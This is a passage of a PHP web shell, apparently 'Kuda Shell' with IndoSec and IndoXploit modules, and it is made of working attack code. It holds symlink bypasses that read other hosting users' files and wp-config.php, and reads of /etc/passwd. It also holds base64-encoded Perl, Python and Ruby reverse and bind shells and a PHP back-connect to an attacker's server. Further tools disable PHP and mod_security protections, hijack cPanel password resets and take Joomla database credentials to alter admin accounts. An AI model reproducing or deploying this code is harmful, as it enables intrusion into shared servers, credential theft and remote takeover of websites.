1488. if(strlen(trim($domains[1][0])) > 2){
1489. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1490. echo "<tr>
1491. <td>".$dcount."</td>
1492. <td class='text-left'><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td>
1493. <td>".$user['name']."</td>
1494. <td><a href='$full/indosec_sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a></td>
1495. </tr>";
1496. flush();
1497. $dcount++;
1498. }
1499. }
1500. }
1501. echo "</table></div>";
1502. }else{
1503. $TEST = @file('/etc/passwd');
1504. if ($TEST){
1505. @mkdir("indosec_sym",0777);
1506. @chdir("indosec_sym");
1507. @exe("ln -s / root");
1508. $file3 = 'Options Indexes FollowSymLinks
1509. DirectoryIndex indsc.html
1510. AddType text/plain php html php5 phtml
1511. AddHandler text/plain php html php5 phtml
1512. Satisfy Any';
1513. $fp3 = fopen('.htaccess','w');
1514. $fw3 = fwrite($fp3,$file3);
1515. @fclose($fp3);
1516. echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
1517. <div class='tmp'>
1518. <table class='text-center table-responsive'>
1519. <thead class='bg-warning'>
1520. <th>No.</th>
1521. <th>Users</th>
1522. <th>symlink </th>
1523. </thead>";
1524. $dcount = 1;
1525. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
1526. while(!feof($file)){
1527. $s = fgets($file);
1528. $matches = array();
1529. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1530. $matches = str_replace("home/","",$matches[1]);
1531. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1532. continue;
1533. echo "<tr>
1534. <td>".$dcount."</td>
1535. <td>".$matches."</td>
1536. <td><a href=$full/indosec_sym/root/home/".$matches."/public_html target='_blank'>Symlink</a></td>
1537. </tr>";
1538. $dcount++;
1539. }
1540. fclose($file);
1541. echo "</table></div>";
1542. }else{
1543. if($os != "Windows"){
1544. @mkdir("indosec_sym",0777);
1545. @chdir("indosec_sym");
1546. @exe("ln -s / root");
1547. $file3 = 'Options Indexes FollowSymLinks
1548. DirectoryIndex indsc.html
1549. AddType text/plain php html php5 phtml
1550. AddHandler text/plain php html php5 phtml
1551. Satisfy Any';
1552. $fp3 = fopen('.htaccess','w');
1553. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1554. echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
1555. <div class='tmp'>
1556. <table class='text-center table-responsive'>
1557. <thead class='bg-danger'>
1558. <th>ID.</th>
1559. <th>Users</th>
1560. <th>symlink </th>
1561. </thead>";
1562. $temp = "";$val1 = 0;$val2 = 1000;
1563. for(;$val1 <= $val2;$val1++){
1564. $uid = @posix_getpwuid($val1);
1565. if ($uid)$temp .= join(':',$uid)."\n";
1566. }
1567. echo '<br/>';$temp = trim($temp);
1568. $file5 = fopen("test.txt","w");
1569. fputs($file5,$temp);
1570. fclose($file5);$dcount = 1;$file =
1571. fopen("test.txt", "r") or exit("Unable to open file!");
1572. while(!feof($file)){
1573. $s = fgets($file);$matches = array();
1574. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1575. $matches = str_replace("home/","",$matches[1]);
1576. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1577. continue;
1578. echo "<tr>
1579. <td>".$dcount."</td>
1580. <td>".$matches."</td>
1581. <td><a href=$full/indosec_sym/root/home/".$matches."/public_html target='_blank'>Symlink</a></td>
1582. </tr>";
1583. $dcount++;
1584. }
1585. fclose($file);
1586. echo "</table></div>";
1587. unlink("test.txt");
1588. }
1589. }
1590. }
1591. exit;
1592. }
1593.  
1594. if($_GET['aksi'] == 'symread') {
1595. echo "read /etc/named.conf";
1596. echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
1597. <textarea class='form-control' rows='13' name='file'>";
1598. flush();
1599. flush();
1600. $file = '/etc/named.conf';
1601. $r3ad = @fopen($file, 'r');
1602. if ($r3ad){
1603. $content = @fread($r3ad, @filesize($file));
1604. echo "".htmlentities($content)."";
1605. }else if (!$r3ad) {
1606. $r3ad = @show_source($file) ;
1607. }else if (!$r3ad) {
1608. $r3ad = @highlight_file($file);
1609. }else if (!$r3ad) {
1610. $sm = @symlink($file,'sym.txt');
1611. if ($sm){
1612. $r3ad = @fopen('sym/sym.txt', 'r');
1613. $content = @fread($r3ad, @filesize($file));
1614. echo "".htmlentities($content)."";
1615. }
1616. }
1617. echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
1618. if(isset($_GET['save'])){
1619. $cont = stripcslashes($_POST['file']);
1620. $f = fopen('named.txt','w');
1621. $w = fwrite($f,$cont);
1622. if($w){
1623. echo '<br/>save has been successfully';
1624. }
1625. fclose($f);
1626. }
1627. exit;
1628. }
1629.  
1630. if ($_GET['aksi'] == 'sym_404'){
1631. $cp = get_current_user();
1632. if($_POST['execute']){
1633. @rmdir("indosec_sym404");
1634. @mkdir("indosec_sym404", 0777);
1635. $dir = $_POST['dir'];
1636. $isi = $_POST['isi'];
1637. @system("ln -s ".$dir."indosec_sym404/".$isi);
1638. @symlink($dir,"indosec_sym404/".$isi);
1639. $inija = fopen("indosec_sym404/.htaccess", "w");
1640. @fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain php html php5 phtml\nAddHandler text/plain php html php5 phtml\nSatisfy Any");
1641. echo'<a href="/indosec_sym404/" target="_blank" class="btn btn-success btn-block mb-3">Click Me!!</a>';
1642. }else{
1643. echo '<h2>Symlink 404</h2>
1644. <form method="post">
1645. File Target: <input type="text" class="form-control" name="dir" value="/home/'.$cp.'/public_html/wp-config.php"><br/>
1646. Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
1647. <input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
1648. <p class="text-muted">NB: Letak wp-config tidak semuanya berada di <u>public_html/wp-config.php</u> jadi silahkan ubah sesuai letaknya.</p>
1649. </form>';
1650. }
1651. exit;
1652. }
1653.  
1654.  
1655. if ($_GET['aksi'] == 'sym_bypas'){
1656. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1657. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
1658. $u = explode("/",$pageFTP );
1659. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
1660. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
1661. $cont = stripcslashes($_POST['file']);
1662. if(!file_exists('passwd.txt')){
1663. $f = @fopen('passwd.txt','w');
1664. $w = @fwrite($f,$cont);
1665. fclose($f);
1666. }
1667. if($w or @filesize('passwd.txt') > 0){
1668. echo "<div class='tmp'>
1669. <table width='100%' class='text-center table-responsive mb-4'>
1670. <thead class='bg-info'>
1671. <th>Users</th>
1672. <th>symlink</th>
1673. <th>FTP</th>
1674. </thead>";
1675. flush();
1676. $fil3 = file('passwd.txt');
1677. foreach ($fil3 as $f){
1678. $u=explode(':', $f);
1679. $user = $u['0'];
1680. echo "<tr>
1681. <td class='text-left pl-1'>$user</td>
1682. <td>
1683. <a href='$full/sym/root/home/$user/public_html' target='_blank'>Symlink </a>
1684. </td>
1685. <td>
1686. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
1687. </td>
1688. </tr>";
1689. flush();
1690. flush();
1691. }
1692. echo "</tr></table></div>";
1693. die();
1694. }
1695.  
1696. }
1697.  
1698. echo "read /etc/passwd <font color='red'>error ? </font><a href='?dir=".$dir."&aksi=passwbypass'>Bypass Here</a>
1699. <form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
1700. <textarea class='form-control' rows='13' name='file'>";
1701. flush();
1702. $file = '/etc/passwd';
1703. $r3ad = @fopen($file, 'r');
1704. if ($r3ad){
1705. $content = @fread($r3ad, @filesize($file));
1706. echo "".htmlentities($content)."";
1707. }elseif(!$r3ad) {
1708. $r3ad = @show_source($file) ;
1709. }elseif(!$r3ad) {
1710. $r3ad = @highlight_file($file);
1711. }elseif(!$r3ad) {
1712.  
1713. for($uid=0;$uid<1000;$uid++){
1714. $ara = posix_getpwuid($uid);
1715. if (!empty($ara)) {
1716. while (list ($key, $val) = each($ara)){
1717. print "$val:";
1718. }
1719. print "\n";
1720. }
1721. }
1722. }
1723. flush();
1724. echo "</textarea><br/>
1725. <input type='submit' class='btn btn-danger btn-block' value='Symlink'/>
1726. </form>";
1727. flush();
1728. exit;
1729. }
1730.  
1731.  
1732. /*
1733. * Back Connect
1734. * Kuda Shell
1735. */
1736. if($_GET['aksi'] == 'bctools'){
1737. echo "<h4 class='text-center mb-4'>Back Connect Tools</h4>
1738. <form method='post'>
1739. <div class='row'>
1740. <div class='col-md-10'>
1741. <span>Bind port to /bin/sh [Perl]</span><br/>
1742. <label>Port :</label>
1743. <div class='form-group input-group mb-4'>
1744. <input type='text' name='port' class='form-control' value='6969'>
1745. <input type='submit' name='bpl' class='btn btn-danger form-control' value='Reserve'>
1746. </div>
1747. <h5>Back-Connect</h5>
1748. <label>Server :</label>
1749. <input type='text' name='server' class='form-control mb-3' placeholder='". $_SERVER['REMOTE_ADDR'] ."'>
1750. <label>Port :</label>
1751. <div class='form-group input-group mb-4'>
1752. <input type='text' name='port' class='form-control' placeholder='443'>
1753. <select class='form-control' name='backconnect'>
1754. <option value='perl'>Perl</option>
1755. <option value='php'>PHP</option>
1756. <option value='python'>Python</option>
1757. <option value='ruby'>Ruby</option>
1758. </select>
1759. </div>
1760. <input type='submit' class='btn btn-danger btn-block' value='Connect'>
1761. </div>
1762. </div>
1763. </form>";
1764.  
1765. if($_POST['bpl']) {
1766. $bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
1767. $brt = @fopen('bp.pl','w');
1768. fwrite($brt,$bp);
1769. $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
1770. sleep(1);
1771. echo "<pre class='text-light'>$out\n".exe("ps aux | grep bp.pl")."</pre>";
1772. unlink("bp.pl");
1773. }
1774. if($_POST['backconnect'] == 'perl') {
1775. $bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
1776. $plbc = @fopen('bc.pl','w');
1777. fwrite($plbc,$bc);
1778. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
1779. sleep(1);
1780. echo "<pre class='text-light'>$out\n".exe("ps aux | grep bc.pl")."</pre>";
1781. unlink("bc.pl");
1782. }
1783. if($_POST['backconnect'] == 'python') {
1784. $becaa = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");
1785. $pbcaa = @fopen('bcpyt.py','w');
1786. fwrite($pbcaa,$becaa);
1787. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
1788. sleep(1);
1789. echo "<pre class='text-light'>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
1790. unlink("bcpyt.py");
1791. }
1792. if($_POST['backconnect'] == 'ruby') {
1793. $becaak = base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
1794. $pbcaak = @fopen('bcruby.rb','w');
1795. fwrite($pbcaak,$becaak);
1796. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
1797. sleep(1);
1798. echo "<pre class='text-light'>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
1799. unlink("bcruby.rb");
1800. }
1801. if($_POST['backconnect'] == 'php') {
1802. $ip = $_POST['server'];
1803. $port = $_POST['port'];
1804. $sockfd = fsockopen($ip , $port , $errno, $errstr );
1805. if($errno != 0){
1806. echo "<font color='red'>$errno : $errstr</font>";
1807. } else if (!$sockfd){
1808. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
1809. } else {
1810. fputs ($sockfd ,"
1811. \n{#######################################}
1812. \n..:: BackConnect PHP By Con7ext ::..
1813. \n{#######################################}\n");
1814. $dir = @shell_exec("pwd");
1815. $sysinfo = @shell_exec("uname -a");
1816. $time = @Shell_exec("time");
1817. $len = 1337;
1818. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
1819. while(!feof($sockfd)){
1820. $cmdPrompt = '[kuda]#:> ';
1821. @fputs ($sockfd , $cmdPrompt );
1822. $command= fgets($sockfd, $len);
1823. @fputs($sockfd , "\n" . @shell_exec($command) . "\n\n");
1824. }
1825. @fclose($sockfd);
1826. }
1827. }
1828. echo "</p>";
1829. exit;
1830. }
1831.  
1832.  
1833. /*
1834. * Bypass Disable Function
1835. * Kuda Shell
1836. */
1837. if($_GET['aksi'] == 'disabfunc'){
1838. echo "<div class='card card-body text-center text-dark'><h4 class='text-center mt-2 mb-3'>Bypass Disable Functions</h2>
1839. <form method='POST'>
1840. <input type='submit' class='btn btn-danger' name='ini' value='php.ini'/>
1841. <input type='submit' class='btn btn-danger' name='htce' value='.htaccess'/>
1842. <input type='submit' class='btn btn-danger' name='litini' value='Litespeed'/>
1843. </form>";
1844. if(isset($_POST['ini'])){
1845. $file = fopen("php.ini","w");
1846. echo fwrite($file,"safe_mode = OFF\ndisable_functions = NONE");
1847. fclose($file);
1848. echo "<a href='php.ini' class='btn btn-success btn-block' target='_blank'>Klik Coeg!</a>";
1849. }elseif(isset($_POST['htce'])){
1850. $file = fopen(".htaccess","w");
1851. echo fwrite($file,"<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
1852. fclose($file);
1853. echo "<p>.htaccess successfully created!</p>";
1854. }elseif(isset($_POST['litini'])){
1855. $iniph = "PD8gZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbImZpbGUiXSk7DQplY2hvIGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbInNzIl07DQo/Pg==";
1856. $byph = "safe_mode = OFF\ndisable_functions = NONE";
1857. $comp = "<Files *.php>\nForceType application/x-httpd-php4\n</Files>";
1858. file_put_contents("php.ini",$byph);
1859. file_put_contents("ini.php",$iniph);
1860. file_put_contents(".htaccess",$comp);
1861. $swa = "success";
1862. $text = "Disable Functions in Litespeed Created";
1863. swall($swa,$text,$dir);
1864. }
1865. echo "</div>";
1866. }
1867.  
1868.  
1869. /*
1870. * Auto Reset Cpanel
1871. * IndoSec
1872. */
1873. if ($_GET['aksi'] == 'resetpasscp') {
1874. echo '<h5 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h5>
1875. <form method="POST">
1876. <div class="form-group input-group">
1877. <div class="input-group-prepend">
1878. <div class="input-group-text"><i class="fa fa-envelope"></i></div>
1879. </div>
1880. <input type="email" name="email" class="form-control" placeholder="Masukan Email..."/>
1881. </div>
1882. <input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>
1883. </div>
1884. </form>';
1885.  
1886. if(isset($_POST['submit'])){
1887. $user = get_current_user();
1888. $site = $_SERVER['HTTP_HOST'];
1889. $ips = getenv('REMOTE_ADDR');
1890. $email = $_POST['email'];
1891. $wr = 'email:'.$email;
1892. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
1893. @fwrite($f, $wr);
1894. @fclose($f);
1895. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
1896. @fwrite($f, $wr);
1897. @fclose($f);
1898. $parm = $site.':2083/resetpass?start=1';
1899. echo '<br/>Url: '.$parm.'';
1900. echo '<br/>Username: '.$user.'';
1901. echo '<br/>Success Reset To: '.$email.'<br/><br/>';
1902. }
1903. exit;
1904. }
1905.  
1906.  
1907. /*
1908. * Auto Edit User
1909. * IndoXploit
1910. */
1911. if($_GET['aksi'] == 'auteduser') {
1912. if($_POST['hajar']) {
1913. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1914. echo "Username dan Password harus lebih dari 6 karakter";
1915. } else {
1916. $user_baru = $_POST['user_baru'];
1917. $pass_baru = md5($_POST['pass_baru']);
1918. $conf = $_POST['config_dir'];
1919. $scan_conf = scandir($conf);
1920. foreach($scan_conf as $file_conf) {
1921. if(!is_file("$conf/$file_conf")) continue;
1922. $config = file_get_contents("$conf/$file_conf");
1923. if(preg_match("/JConfig|joomla/",$config)) {
1924. $dbhost = ambilkata($config,"host = '","'");
1925. $dbuser = ambilkata($config,"user = '","'");
1926. $dbpass = ambilkata($config,"password = '","'");
1927. $dbname = ambilkata($config,"db = '","'");
1928. $dbprefix = ambilkata($config,"dbprefix = '","'");
1929. $prefix = $dbprefix."users";
1930. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1931. $db = mysql_select_db($dbname);
1932. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1933. $result = mysql_fetch_array($q);
1934. $id = $result['id'];
1935. $site = ambilkata($config,"sitename = '","'");
